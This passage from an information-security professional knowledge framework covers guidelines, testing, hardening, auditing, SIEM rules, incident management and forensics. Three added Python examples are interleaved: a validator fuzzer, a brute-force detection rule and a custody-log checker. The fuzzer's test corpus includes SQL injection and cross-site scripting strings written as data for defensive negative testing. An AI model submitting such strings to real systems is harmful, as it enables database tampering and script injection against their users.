• Grant, modify, or revoke privileges, including adding a new user or group, changing user privilege
levels, changing file permissions, changing database object permissions.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
2.5.5. Guidelines
As we said earlier, a guideline is a collection of system-specific or procedure-specific "suggestions" for best practice. They are not requirements to be met, but are strongly recommended. Guidelines can provide advice, direction and best practice in instances where it is difficult to define a policy or procedure. Organisations can produce just a few or as many as they feel they want to. Typical titles of guidelines are provided below; you should be able to work out what most of them are intended to do:
• Information classification guidelines.
• Using encryption to protect your data.
• Guideline for Virus Protection.
• Guidance on Backing-up Data
• Electronic Mail guidelines.
• Use of USB memory sticks.
• Remote Access guidance.
• Spam, Phishing and Spear Phishing emails.
• Data Protection Act guidance.
• Sharing Data with External Organisations guidance.
• Guidelines when working from home.
• Travelling abroad.
• Guidance on Social Media and Social Networking
This list is not supposed to be exhaustive by any means but it should give you an idea of the type of
guidelines or guidance an organisation could have.
Copyright, Designs and Patents Act: Copyright, Designs and Patents Act 1988. http://www.legislation.gov.uk/ukpga/1988/48/contents
NIS Directive: DIRECTIVE (EU) 2016/1148 OF THE EUROPEAN PARLIAMENT AND OF THE COUNCIL of 6 July 2016 concerning measures for a high common level of security of network and information systems across the Union. http://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:32016L1148&rid=1
General Data Protection Regulation: The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679). http://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:32016R0679&from=EN
Policies
Name: Description and Location
ISO/IEC 27002: ISO/IEC 27002:2013. Information technology — Security techniques — Information security management systems — Code of practice for information security controls. Part of the ISO/IEC 27000 family of standards.
Standards
Name: Description and Location
NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization. http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf
Guidelines
Name: Description and Location
ISO/IEC 27002: ISO/IEC 27002:2013. Information technology — Security techniques — Information security management systems — Code of practice for information security controls. Part of the ISO/IEC 27000 family of standards.
Security Awareness
Name: Description and Location
PCI DSS guidance: Best Practices for Implementing a Security Awareness Program. https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf
NIST Special Publication 800-50: Building an Information Technology Security Awareness and Training Program. http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-50.pdf
Strategies
Name: Description and Location
NCSC: NATIONAL CYBER SECURITY STRATEGY 2016-2021. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/567242/national_cyber_security_strategy_2016.pdf
2.6.3. Testing
All software and applications must be tested. In section 2.2.3 we looked at vulnerability assessments and penetration testing performed by specialised teams, potentially from an external organisation. This section looks at the type of testing that the development teams could (or should!) be performing. These tests are usually performed on a development or pre-production system, whereas vulnerability assessments and penetration tests are frequently performed on a production system (although they can also be undertaken on a pre-production system).
All development teams will do some testing, usually of a functional nature, referred to as functional testing. The problem with only doing this type of testing is that it only tests positive results; this is referred to as positive testing. Testing must also be performed for erroneous and bad input, for instance trying to inject code into a field that should only contain numeric values. This is termed negative testing. In particular, the testers in the development teams should be looking for SQL injection, cross-site scripting and buffer overflow vulnerabilities.
Developers should also look at using static code analysis and fuzzing tools. Fuzzing is a software testing
technique, often automated or semi-automated, that involves providing invalid, unexpected, or random
data to the inputs of a program. The program is then monitored for exceptions such as crashes. Whilst
this is a specialist area most development staff should have no problem in using such tools.
OWASP have published the OWASP Testing Guide which is a very valuable resource for anyone involved
in developing and testing web applications.
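As an added example, not from the framework or the OWASP Testing Guide, here is negative testing and fuzzing applied to the case mentioned above, a field that should only contain numeric values: a naive validator, a hardened one, and a small seeded fuzzer that records inputs escaping with anything other than a clean rejection. Both validators, the seed corpus and the mutation alphabet are constructed.

```python
"""Negative testing and fuzzing a numeric-field validator.

Added example, not code from the IISP Knowledge Framework or the OWASP
Testing Guide. Both validators and the seed inputs are constructed.
"""
import random
import re
from typing import Callable, List, Optional, Tuple


class ValidationError(ValueError):
    """The one exception a caller is expected to handle: a clean rejection."""


def naive_quantity(field: str) -> int:
    """A 'looks numeric' check followed by conversion. Positive (functional)
    tests with inputs like "42" pass; only negative tests find the gap."""
    if not field.isdigit():
        raise ValidationError("not a number")
    return int(field)


def strict_quantity(field: str) -> int:
    """Hardened version: accept ASCII digits only and bound the length.

    [0-9] is a literal range. \\d would also match Unicode digit characters
    such as Arabic-Indic numerals, which int() accepts but a downstream
    database or parser may not."""
    if not isinstance(field, str) or not re.fullmatch(r"[0-9]{1,9}", field):
        raise ValidationError("not a number")
    return int(field)


# Constructed negative-test corpus: empty, signed, injection attempts, non-ASCII
# digits, and characters that count as 'digits' without being decimal digits.
SEEDS: List[str] = [
    "", "0", "42", "-1", "+7", "1e3", "1_000", " 12", "12 ",
    "1; DROP TABLE orders", "<script>alert(1)</script>",
    "\u0661\u0662",  # Arabic-Indic one, two: isdigit() True and int() == 12
    "\u00b2",        # superscript two: isdigit() True, but int() raises
    "9" * 400,
]
# Constructed mutation alphabet: digits, non-ASCII digits, quote, semicolon, <, space.
ALPHABET = [0x30, 0x39, 0x0661, 0x00B2, 0x27, 0x3B, 0x3C, 0x20]


def mutate(seed: str, rng: random.Random) -> str:
    """Cheap mutation: insert a character, delete one, or double the string."""
    chars = list(seed)
    choice = rng.randrange(3)
    if choice == 0 or not chars:
        chars.insert(rng.randrange(len(chars) + 1), chr(rng.choice(ALPHABET)))
    elif choice == 1:
        del chars[rng.randrange(len(chars))]
    else:
        chars *= 2
    return "".join(chars)


def fuzz(validator: Callable[[str], int], iterations: int = 2000,
         seed: int = 1) -> List[Tuple[str, str]]:
    """Run every seed, then random mutations of inputs seen so far, through the
    validator and record inputs that escape with anything other than
    ValidationError. In a web application such an escape is a crash (an HTTP
    500) rather than a clean rejection. Returns (input, exception name) pairs."""
    rng = random.Random(seed)          # fixed seed: the run is reproducible
    crashes: List[Tuple[str, str]] = []
    corpus: List[str] = []
    seen = set()

    def probe(candidate: str) -> None:
        if candidate in seen:
            return
        seen.add(candidate)
        corpus.append(candidate)
        try:
            validator(candidate)
        except ValidationError:
            return                       # expected: bad input rejected cleanly
        except Exception as exc:         # anything else is a finding
            crashes.append((candidate, type(exc).__name__))

    for s in SEEDS:
        probe(s)
    for _ in range(iterations):
        probe(mutate(rng.choice(corpus), rng))
    return crashes


def first_crash(validator: Callable[[str], int]) -> Optional[Tuple[str, str]]:
    found = fuzz(validator)
    return found[0] if found else None


if __name__ == "__main__":
    print("naive :", first_crash(naive_quantity))   # finds the superscript case
    print("strict:", first_crash(strict_quantity))  # None: only clean rejections
```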
2.6.4. Hardening
Hardening is also known as secure configuration and sometimes as lockdown. It is the secure
configuration of an operating system, device, service or an application to remove vulnerabilities that are
present in a standard build. Many products are sold in a form that is either insecure or allows attackers
easy access. Some products are sold already hardened – at least to some degree.
The basic principles of hardening are as follows:
• Reduce the attack surface of systems. This means not installing unnecessary components of operating systems or applications, and conforms to the security design principle of minimisation we mentioned previously.
• Change default passwords to ones with good password strength.
• Delete or disable unnecessary user accounts.
• Rename privileged accounts from their default names, e.g. "root".
The process starts by identifying vulnerabilities and patches issued by all the vendors used in the system, as well as from other sources such as CERTs. The first thing to do is to establish whether the vulnerabilities are in products within your system. For instance, Oracle issues Critical Patch Updates and Security Alerts on a regular basis; however, these cover all of their products, and you may determine that some of those products are not used in your system.
Assuming it is identified that the vulnerability affects your system, you first need to establish whether a workaround is available. If there is, then the associated patches can be applied when the next routine scheduled maintenance occurs. If a workaround is not available then a determination needs to be made as to how high a risk the vulnerability is. If it is a high risk then you may want to patch immediately. If it is not high risk then again it can wait until the next scheduled maintenance. Many organisations use the CVSS scoring system to determine the level of risk of the vulnerability. As part of the initial triage you also need to establish whether it is a viable threat. For example, you would need to establish whether it is worth the effort of addressing the risk of an external attack on a stand-alone system.
Once patches are applied, this needs to be documented.
Whilst this is an overview, there are some complexities. Before patching any application, device or operating system you should test it; you really don't want to deploy an updated application without testing. For routine scheduled maintenance you can factor in that testing needs to be performed in a pre-production environment. For high-risk patches it is more complicated: if the release procedure indicates that the system requires 3 or 4 days of testing before it can be moved to production, what do you do? It may be that you need an emergency procedure such that, if it is a critical patch, it is deployed straight away without testing. This is obviously high risk and it is recommended that the business signs this off, as a potential business impact is that the system may crash. If it is not quite so critical then the organisation may be comfortable with taking several days of testing before deploying into production. If the system needs to be taken off-line for a significant period of time to apply patches, such as an hour or more, then the business needs to be consulted. It may be
Figure - Data security lifecycle (diagram labels: Store, Use, Share, Archive, Destroy)
Answering all these questions will enable an organisation to complete a privacy impact assessment.
The Security Development Lifecycle: The Security Development Lifecycle: SDL: A Process for Developing Demonstrably More Secure Software (Developer Best Practices). Michael Howard, Steve Lipner. ISBN 978-07356-2214-2
OWASP ASVS: The OWASP Application Security Verification Standard. https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project
Secure Coding
Name: Description and Location
SEI CERT Coding Standards: https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards Contains standards for C, C++, Java, Perl and Android.
OWASP Secure Coding: https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
PAS 754: British Standard PAS 754:2014. Software Trustworthiness. Governance and management. Specification. http://shop.bsigroup.com/ProductDetail?pid=000000000030284608
Testing
Name: Description and Location
OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
Hardening
Name: Description and Location
National Cyber Security Centre (NCSC): Guidance. https://www.ncsc.gov.uk/guidance
National Institute of Standards and Technology (NIST): NIST Special Publication (SP-800) series. http://csrc.nist.gov/publications/PubsSPs.html
Center for Internet Security (CIS): CIS Security Benchmarks. https://benchmarks.cisecurity.org/
Department of Defence (DoD): Security Technical Implementation Guides (STIGs). http://iase.disa.mil/stigs/Pages/index.aspx
IISP Knowledge Framework Version 1.0 August 2017 Page 100 of 195
Independent Assurance
Name: Description and Location
ISO/IEC 15408: ISO/IEC 15408-1:2009. Information technology -- Security techniques -- Evaluation criteria for IT security -- Part 1: Introduction and general model. ISO/IEC 15408-2:2008. Information technology -- Security techniques -- Evaluation criteria for IT security -- Part 2: Security functional components. ISO/IEC 15408-3:2008. Information technology -- Security techniques -- Evaluation criteria for IT security -- Part 3: Security assurance components.
CC Certified Products List: https://www.commoncriteriaportal.org/products/
CPA: Commercial Product Assurance scheme run by NCSC. https://www.ncsc.gov.uk/document/cpa-scheme-library
CPA Security Characteristics: Security Characteristics published by NCSC. https://www.ncsc.gov.uk/document/security-characteristics-collection
FIPS 140-2: Federal Information Processing Standards Publication - Security Requirements For Cryptographic Modules (issue 2) May 25, 2001. Published by NIST. http://csrc.nist.gov/groups/STM/cmvp/standards.html#02
Validated FIPS 140-1 and FIPS 140-2 Cryptographic Modules: Published by NIST. http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm
CAPS: https://www.ncsc.gov.uk/articles/information-about-caps
Patch Management
Name: Description and Location
NIST SP 800-40: NIST Special Publication 800-40 Revision 3. Guide to Enterprise Patch Management Technologies. July 2013. http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
Change Management
Name: Description and Location
ITIL: https://www.axelos.com/best-practice-solutions/itil/what-is-itil
Data Security Lifecycle
Name: Description and Location
Data Security Lifecycle: Data Security Lifecycle 2.0. https://www.securosis.com/blog/data-security-lifecycle-2.0
2.7. Operational Compliance
In this section we look at various techniques that organisations can implement and invoke to establish whether their ISMS is being effectively and efficiently operated and managed whilst complying with relevant legal, statutory and regulatory requirements. Relevant regulations and legislation will define what policies and security controls should be implemented within the ISMS. Independent audits can establish whether the business and the corresponding ISMS are compliant.
Compliance monitoring allows an organisation to monitor the security controls and associated policies,
especially those that have been defined by the relevant regulatory framework or legal requirements.
Protective monitoring allows an organisation to monitor the system as well as the technical controls.
Any non-compliance detected can be fed into the compliance monitoring process. Both compliance
monitoring and protective monitoring may detect security events – in which case they will be handled
by the incident management process.
Figure 31 illustrates the inter-relationship between these techniques.
2.7.1. Auditing
In ISO/IEC 27000 audit is defined as:
“Systematic, independent and documented process for obtaining audit evidence and evaluating
it objectively to determine the extent to which the audit criteria are fulfilled.”
There are two types of audit: an internal audit and an external audit. In both cases, however, they need to be performed by independent teams. Many organisations have internal audit teams, although usually they are not focused just on security; in fact security is just a small part of what they perform.
Audits are performed to ascertain the validity and reliability of information, and also to provide an assessment of a system's security controls. The goal of an audit is to express an opinion on the organisation or system in question. It is very similar to going through a checklist of security controls and management processes to establish that they have been implemented and are effective. Usually the audit team will audit a system or organisation against a standard, such as ISO/IEC 27001. The standards do not have to be purely about security. For instance, the Sarbanes–Oxley Act in the US requires compliance audits. This US Act protects shareholders and the general public from accounting errors and fraudulent practices in the enterprise, as well as improving the accuracy of corporate disclosures. Whilst compliance audits for the Sarbanes–Oxley Act are mainly concerned with accounting and financial statements, the Act does require the auditors to look at security controls. A compliance audit is sometimes referred to as a compliance gap analysis.
ISO/IEC 27001 requires compliant organisations to conduct internal audits at planned intervals to provide information on whether the information security management system conforms to the organisation's own requirements for its ISMS, and whether it has been effectively implemented and maintained. More details on ISO/IEC 27001 audits and certifications can be found in section 2.3.2. The processes and requirements for performing ISO/IEC 27001 audits or certifications can be found in ISO/IEC 27006.
The Payment Card Industry Data Security Standard (PCI DSS) requires validation of compliance annually. For organisations handling large volumes of credit card transactions this is usually performed by an external Qualified Security Assessor (QSA) or by an Internal Security Assessor (ISA), who creates a Report on Compliance (ROC). For organisations handling small volumes it is possible to submit a Self-Assessment Questionnaire (SAQ).
Many organisations audit their third-party suppliers, for instance cloud service providers. The standards they use could be ones they have devised themselves, a particular industry standard, or ones based on standards such as ISO/IEC 27001 or the Payment Card Industry Data Security Standard.
• In extreme cases, criminal liability (potentially against individuals rather than just the organisation).
Organisations often discover that adhering to a compliance scheme does generate a number of
benefits, including:
• Reducing the risk of security incidents, saving costs associated with incident response.
• Protecting reputation, when risks are managed more effectively.
• Improving incident response.
• Providing evidence of good governance and risk management.
The compliance monitoring function provides ongoing oversight of the implementation of the organisation's policies and security controls. Compliance monitoring is often a combination of manual checklists and IT controls. An example of a manual checklist is looking at recent new employees to establish whether they have had an employment check, received induction training and signed an acceptable use policy.
A SIEM platform (which will be discussed in the next section) can also be leveraged for monitoring. Compliance helps the organisation reduce risk, and the monitoring process can uncover gaps, but ultimately it is the compliance owner who is accountable for sign-off.
Compliance monitoring ensures that evidence is produced demonstrating the effective implementation
of policies, procedures, and controls. It is essential that evidence be collected in a consistent and
comprehensible fashion. If certification is a requirement for the organisation, such as against ISO/IEC
27001, then this documentation can support the certification process.
Figure 32 - Security Operations Centre
Typically the SOC would use a Security Information and Event Management (SIEM) platform to provide
real-time analysis of the collected audit events. SIEMs can also be used to assist in post-event forensic
investigations.
Most SIEM platforms combine log management with a powerful analytics engine. The analytics engine can run complex rules and advanced correlations against incoming event data, and can therefore detect patterns of behaviour that may be undetectable by boundary devices or on single end-user devices. It can also look for events that have been detected across multiple devices, which may signal an emerging threat.
A SIEM can be used to look for the following:
• Detection of a brute force attack.
• Detection of malware activity.
• Detection of suspicious user behaviour.
• Suspicious device behaviour.
• Unauthorised system changes.
As an example, one of the rules you could configure when the SIEM is looking for repeated login attempts is given below:
Goal: Early warning for brute force attacks and password guessing.
Trigger: Alert on 5 or more failed logins in 1 minute on a single user identifier.
Event Sources: Active Directory, Unix/Linux hosts, applications, network switches, network routers, firewalls.
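The trigger above implemented as a sliding-window correlation rule over constructed log lines, as an added example that is not part of the framework or any SIEM product. It assumes two constructed event formats (an sshd-style failed-password line and a Windows-style line carrying EventID=4625) and normalises the user identifier so the same account correlates across both sources.

```python
"""SIEM correlation rule: 5 or more failed logins within 1 minute for one user.

Added example, not the IISP Knowledge Framework's or any SIEM vendor's code.
The two line formats, host names, user names and timestamps are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Set, Tuple

THRESHOLD = 5                  # failures
WINDOW = timedelta(minutes=1)  # within this period

# Constructed event sources, both reduced to (timestamp, user, host):
#   Linux sshd style: "<ts> <host> sshd: Failed password for <user> from <ip>"
#   Windows/AD style: "<ts> <host> EventID=4625 TargetUserName=<user>"
SSHD = re.compile(r"^(\S+) (\S+) sshd: Failed password for (?:invalid user )?(\S+) from")
AD_FAIL = re.compile(r"^(\S+) (\S+) EventID=4625 TargetUserName=(\S+)")


def parse_failure(line: str) -> Optional[Tuple[datetime, str, str]]:
    """Return (timestamp, user, host) for a failed-login line, None for anything else."""
    for pattern in (SSHD, AD_FAIL):
        m = pattern.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            # Normalise the identifier so DOMAIN\alice, Alice and alice correlate as one user.
            user = m.group(3).rsplit("\\", 1)[-1].lower()
            return ts, user, m.group(2)
    return None


def detect_bruteforce(lines: List[str]) -> List[Dict[str, object]]:
    """Per-user sliding window across all sources.

    An alert fires when the count first reaches THRESHOLD inside WINDOW; the
    window is then cleared so one attack yields one alert, not one per event.
    """
    windows: Dict[str, Deque[datetime]] = defaultdict(deque)
    hosts: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[Dict[str, object]] = []
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue
        ts, user, host = parsed
        window = windows[user]
        window.append(ts)
        hosts[user].add(host)
        while window and ts - window[0] > WINDOW:   # drop events older than 1 minute
            window.popleft()
        if len(window) >= THRESHOLD:
            alerts.append({
                "user": user,
                "failures": len(window),
                "first": window[0].isoformat(),
                "last": ts.isoformat(),
                "sources": sorted(hosts[user]),
            })
            window.clear()
            hosts[user].clear()
    return alerts


# Constructed sample: alice fails 5 times in 40 s across two sources (alert);
# bob fails 5 times spread over 6 minutes (no alert); carol fails 4 times (no alert).
SAMPLE_LOG = [
    "2017-08-01T09:00:01Z srv1 sshd: Failed password for alice from 10.0.0.5",
    "2017-08-01T09:00:05Z dc01 EventID=4625 TargetUserName=CORP\\alice",
    "2017-08-01T09:00:09Z srv1 sshd: Accepted password for dave from 10.0.0.7",
    "2017-08-01T09:00:12Z srv1 sshd: Failed password for alice from 10.0.0.5",
    "2017-08-01T09:00:20Z dc01 EventID=4625 TargetUserName=bob",
    "2017-08-01T09:00:30Z dc01 EventID=4625 TargetUserName=Alice",
    "2017-08-01T09:00:41Z srv1 sshd: Failed password for alice from 10.0.0.5",
    "2017-08-01T09:01:30Z dc01 EventID=4625 TargetUserName=bob",
    "2017-08-01T09:03:00Z dc01 EventID=4625 TargetUserName=bob",
    "2017-08-01T09:04:30Z dc01 EventID=4625 TargetUserName=bob",
    "2017-08-01T09:06:00Z dc01 EventID=4625 TargetUserName=bob",
    "2017-08-01T09:06:01Z srv1 sshd: Failed password for carol from 10.0.0.9",
    "2017-08-01T09:06:02Z srv1 sshd: Failed password for carol from 10.0.0.9",
    "2017-08-01T09:06:03Z srv1 sshd: Failed password for carol from 10.0.0.9",
    "2017-08-01T09:06:04Z srv1 sshd: Failed password for carol from 10.0.0.9",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```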
Most regulatory guidelines require some form of audit event collection and log management function.
SIEMs provide a mechanism to rapidly and easily deploy an audit event collection infrastructure that
directly supports this requirement, and allows instant access to recent audit data, as well as archived log
data. A SIEM can be used to produce reports of various types, including for management. Hence a SIEM
assists in performing compliance monitoring.
Many large organisations also have a Network Operations Centre (NOC). A NOC is used to manage a network as well as to monitor its health.
2.7.4. Incident Management
All organisations have to deal with information security incidents – no matter how perfect the security
controls or security awareness programs. Information security incidents come as network attacks from
hackers, virus outbreaks or simply from someone not following procedures. The impact of such an
incident might be a confidentiality breach or maybe a denial of service attack. There may be no harm
done, but an incident can still serve the purpose of highlighting a lack of security awareness or a flaw in
the implementation of security controls.
Information security incident management is concerned with the processes for detecting, reporting,
assessing, responding to, dealing with, and learning from information security incidents. An information
security event could be reported by a member of staff or it could have been detected by protective
monitoring.
Figure 33 shows information security incidents in the context of the risk wheel we showed in the
previous risk management section. A threat exploits vulnerabilities in information systems causing the
occurrence of information security events and thus potentially causing information security incidents to
information assets exposed by the vulnerabilities. Information security incidents compromise the
operations of an organisation.
• Information security incidents are assessed and responded to in the most appropriate and efficient
manner.
• Adverse effects of information security incidents on the organisation and its operations are
minimised by appropriate use of security controls as part of incident response.
• Appropriate links with crisis management and business continuity management should be
established as necessary.
• Security vulnerabilities are assessed and dealt with appropriately to prevent or reduce information
security incidents.
• Lessons are learnt quickly from information security incidents, vulnerabilities and their
management. This feedback mechanism is intended to increase the chances of preventing future
information security incidents from occurring, improve the implementation and use of security
controls, and improve the overall information security incident management plan.
ISO/IEC 27035 defines that there are five distinct phases in incident management, as shown in the
following figure:
Forensics concerns the gathering of digital evidence that could be used in a court of law, employment
tribunal or similar. A key concept in digital forensics (or any form of forensics) is the continuity of
evidence, which is sometimes referred to as chain of custody. Continuity of evidence ensures that there
is a witnessed, written record of all of the individuals who maintained unbroken control over items of
physical or digital evidence. A key principle of gathering digital evidence is that no action should change
data held on a computer or storage media which may subsequently be relied upon in court. For hard
disk drives this means taking a secure copy of the original disk drive that potentially holds digital
evidence that could be used in a court proceeding.
Digital forensics support is not required for every incident; however, this is not always apparent until you start assessing an incident. Undertaking a forensics investigation is a specialist skill, with few organisations having an in-house capability. This should be taken into account during the Plan and Prepare phase and, ideally, a Forensics Readiness Plan created. Part of the plan would be who to contact externally if you need access to forensics expertise.
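The two principles above, a hashed secure copy of the original media and a continuous record of who held the evidence, as an added example that is not the framework's code. The "drive" contents, exhibit id, handler names and timestamps are constructed; the hash-chained custody log is one way to make silent edits to the record detectable and stands in for the witnessed written record, not for it.

```python
"""Verifying a forensic copy and keeping a tamper-evident continuity-of-evidence log.

Added example, not code from the IISP Knowledge Framework. The drive contents,
exhibit id, names and timestamps are constructed.
"""
import hashlib
import json
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def acquire_image(source: bytes) -> Tuple[bytes, str]:
    """Hash the original before anything else touches it, then take a bit-for-bit copy.

    In practice the source is read through a write blocker; here a bytes object
    stands in for a raw disk. Returns (image, original_hash).
    """
    original_hash = sha256_hex(source)
    image = bytes(source)
    return image, original_hash


def verify_image(image: bytes, original_hash: str) -> bool:
    """The copy can only be relied upon if it hashes to the same value as the original."""
    return sha256_hex(image) == original_hash


@dataclass
class CustodyEntry:
    when: str            # ISO-8601 timestamp supplied by the caller
    handler: str         # named individual taking control of the item
    action: str          # e.g. 'seized', 'imaged', 'transferred', 'sealed'
    item_hash: str       # hash of the evidence item at this point
    prev_entry_hash: str # links this record to the one before it
    entry_hash: str = ""

    def compute_hash(self) -> str:
        body = json.dumps([self.when, self.handler, self.action, self.item_hash,
                           self.prev_entry_hash], separators=(",", ":"))
        return sha256_hex(body.encode())


@dataclass
class CustodyLog:
    """Each entry commits to the previous one, so rewriting or deleting a
    record breaks every later link. It does not replace witnessing or
    signatures; it only makes silent edits detectable."""
    item_id: str
    entries: List[CustodyEntry] = field(default_factory=list)

    def record(self, when: str, handler: str, action: str, item_hash: str) -> CustodyEntry:
        prev = self.entries[-1].entry_hash if self.entries else sha256_hex(self.item_id.encode())
        entry = CustodyEntry(when, handler, action, item_hash, prev)
        entry.entry_hash = entry.compute_hash()
        self.entries.append(entry)
        return entry

    def verify(self) -> bool:
        prev = sha256_hex(self.item_id.encode())
        for entry in self.entries:
            if entry.prev_entry_hash != prev or entry.compute_hash() != entry.entry_hash:
                return False
            prev = entry.entry_hash
        return True


def demo() -> Dict[str, bool]:
    """Constructed scenario: image a 'drive', verify it, log custody, then tamper with the log."""
    drive = b"MBR\x00" + bytes(range(256)) * 4        # stand-in for a raw disk
    image, original_hash = acquire_image(drive)
    log = CustodyLog("EXHIBIT-CONSTRUCTED-001")
    log.record("2017-08-01T10:00:00Z", "A. Examiner", "seized", original_hash)
    log.record("2017-08-01T11:30:00Z", "A. Examiner", "imaged", sha256_hex(image))
    log.record("2017-08-01T12:00:00Z", "B. Custodian", "transferred", sha256_hex(image))
    intact = log.verify()
    log.entries[2].handler = "C. Unknown"               # someone quietly rewrites a record
    return {
        "image_ok": verify_image(image, original_hash),
        "corrupt_copy_ok": verify_image(image[:-1] + b"\x00", original_hash),
        "log_ok_before": intact,
        "log_ok_after": log.verify(),
    }


if __name__ == "__main__":
    print(demo())
```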
Auditing
Name Description and Location
ISO/IEC 27006 ISO/IEC 27006:2015. Information technology — Security techniques —
Requirements for bodies providing audit and certification of information
security management systems.
PCI DSS Payment Card Industry (PCI). Data Security Standard Requirements and
Security Assessment Procedures.
https://www.pcisecuritystandards.org/pci_security/
Compliance Monitoring
Name Description and Location
PCI DSS Payment Card Industry (PCI). Data Security Standard Requirements and
Security Assessment Procedures.
https://www.pcisecuritystandards.org/pci_security/
COBIT Control Objectives for Information and Related Technologies
https://www.isaca.org/COBIT/Pages/default.aspx
SOX The Sarbanes–Oxley Act of 2002, also known as the "Public Company
Accounting Reform and Investor Protection Act" and "Corporate and Auditing
Accountability, Responsibility, and Transparency Act"
https://www.gpo.gov/fdsys/pkg/PLAW-107publ204/pdf/PLAW-
107publ204.pdf
Protective Monitoring
Name Description and Location
NONE
Incident Management
Name Description and Location
ISO/IEC 27035-1:2016 Information technology -- Security techniques -- Information security incident
management -- Part 1: Principles of incident management
ISO/IEC 27035-2:2016 Information technology -- Security techniques -- Information security incident
management -- Part 2: Guidelines to plan and prepare for incident response
3. Knowledge Levels
In this section we take the principles stated in the IISP Skills Framework plus the requirements for Level
1 and Level 2 and then expand upon the requirements for knowledge and understanding.
In the following pages we provide a table for each Skill Area within each Security Discipline in the IISP
Skills Framework with each table containing:
Security Discipline: Information Security Governance and Management
Skill Area: Governance (Ref: A1)
Directs, oversees, designs, implements or operates within the set of multi-disciplinary structures, policies,
procedures, processes and controls implemented to manage Cyber and Information Security at an Enterprise
level, supporting an organisation's immediate and future regulatory, legal, risk, environmental and operational
requirements and ensuring compliance with those requirements.
Level 1
Can describe the principles of Information Security Governance. Can list the potential impacts that occur
where poor Information Governance has been observed.
They shall be able to describe:
• The importance of governance structures.
• Information governance within an organisation and key bodies and membership.
Level 2
Can explain the basic principles of Information Security Governance and how it applies within an organisation.
They shall be able to explain:
• Approaches for establishing and monitoring good governance within an organisation.
• The importance of Board level support and responsibilities.
• Key governance legislation/regulation, e.g. the UK Companies Act.
• Statutory, regulatory and advisory requirements.
• The potential business impact of poor information governance.
Security Discipline: Information Security Governance and Management
Skill Area: Policy & Standards (Ref: A2)
Directs, develops or maintains organisational Cyber and Information Security policies, standards and processes
using recognised standards (e.g. the ISO/IEC 27000 family, the Security Policy Framework) where appropriate.
Applies recognised Cyber and Information Security standards and policies within an organisation, programme,
project or operation.
Level 1
Can describe the main policies and standards relevant to the Information Security discipline and/or
organisation.
Level 2
Can explain the main concepts of the main Information Security policies and standards. This might include
experience of applying knowledge of Information Security policies and standards in a training or academic
environment, for example through participation in syndicate exercises, undertaking practical exercises, and/or
passing a test or examination.
Security Discipline: Information Security Governance and Management
Skill Area: Information Security Strategy (Ref: A3)
Directs, develops or maintains plans and processes to manage Cyber and Information Security risks
appropriately and effectively, whilst complying with legal, statutory, contractual, and business requirements.
Level 1
Can describe the purpose of Information Security strategies and how they can benefit the business.
They shall be able to name one security strategy in an organisation.
They shall be able to describe the purpose of a security strategy.
Level 2
Can explain the basic principles of Information Security Strategy and how it applies within an organisation.
They shall be able to explain the purpose of security strategies and potential business benefits.
They shall be able to explain the different elements in a typical strategy.
They shall be able to explain the business benefits of one strategy.
They shall be able to explain the factors influencing the development of a strategy.
Security Discipline: Information Security Governance and Management
Skill Area: Innovation & Business Improvement (Ref: A4)
Recognises potential strategic application of Cyber and Information Security and initiates investigation and
development of innovative methods of protecting information assets, to the benefit of the organisation and the
interface between business and information security.
Exploits opportunities for introducing more effective secure business and operational processes.
Level 1
Can list the potential impacts of poor Information Security and the business benefits of Information Security.
They shall be able to recognise the potential impact on a business due to poor information security.
Level 2
Can explain how good Cyber and Information Security strategies and processes can benefit the business, and
provide examples.
They shall be able to explain the business benefits of improving information security and provide several
examples.
They shall be able to explain how implementing an ISMS can provide business improvement.
They shall be able to explain how a security strategy could benefit a business.
Security Discipline: Information Security Governance and Management
Skill Area: Behavioural Change (Ref: A5)
Identifies Cyber and Information Security awareness, training and culture management needs in line with
security strategy, business needs and strategic direction, and gains management commitment and resources to
support these needs.
Manages the development or delivery of Cyber and Information Security awareness and training, behavioural
analysis programmes and/or security culture management programmes, applying analysis of human factors as
appropriate.
Level 1
Recognises the role of Information Security awareness and training, and can list the benefits of behavioural
analysis and security culture management in maintaining good Information Security.
They shall be able to list several security policies that all users should be aware of.
They shall be able to list several examples of where poor security awareness caused a business impact.
They shall be able to describe security weaknesses in a typical organisation.
Level 2
Can explain the concepts of Information Security awareness and security culture management and give
examples of good practice.
They shall be able to explain the security awareness training that should be present in a typical organisation.
They shall be able to explain to non-IS staff the importance of security awareness and the potential impacts
to the business.
They shall be able to explain different techniques for delivering and measuring behavioural change.
Security Discipline: Information Security Governance and Management
Skill Area: Legal & Regulatory Environment and Compliance (Ref: A6)
Understands the legal and regulatory environment within which the business operates.
Ensures that Information Security Governance arrangements are appropriate.
Ensures that the organisation complies with legal and regulatory requirements.
Level 1
Can describe the major legislative and regulatory instruments relevant to Information Security (e.g. Data
